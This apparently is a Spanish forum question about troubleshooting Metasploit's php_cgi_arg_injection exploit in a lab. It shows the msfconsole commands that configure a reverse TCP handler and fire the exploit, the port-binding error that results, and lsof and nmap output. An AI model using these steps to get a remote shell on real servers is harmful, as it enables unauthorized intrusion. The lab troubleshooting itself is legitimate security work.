Tengo una configuración de servidor en un laboratorio remoto que estoy intentando probar con php_cgi_arg_injection. El exploit funciona, pero no se crea ninguna sesión.
El enrutador de la red local está configurado para reenviar 4444 a <Local IP>
.
Estoy usando Kali Linux en mi máquina local.
Consola 1:
use exploit/multi/handler
set LHOST <Local IP>
Consola 2:
use exploit/multi/http/php_cgi_arg_injection
set LHOST <External IP>
set RHOST <Target IP>
Salida 1:
[*] Started reverse TCP handler on <Local IP>:4444
Salida 2:
[-] Handler failed to bind to <Local IP>:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
No puedo descubrir por qué no se puede enlazar en 0.0.0.0.
Salida de sudo lsof -i -P -n | grep LISTEN
ruby 2227 root 9u IPv4 38502 0t0 TCP <Local IP>:4444 (LISTEN)
Salida de nmap <External IP>
PORT STATE SERVICE
4444/tcp open krb524
enlace informa que mi 4444 externo está abierto, y el usuario responde con una sesión abierta que muere de inmediato. (Comportamiento esperado)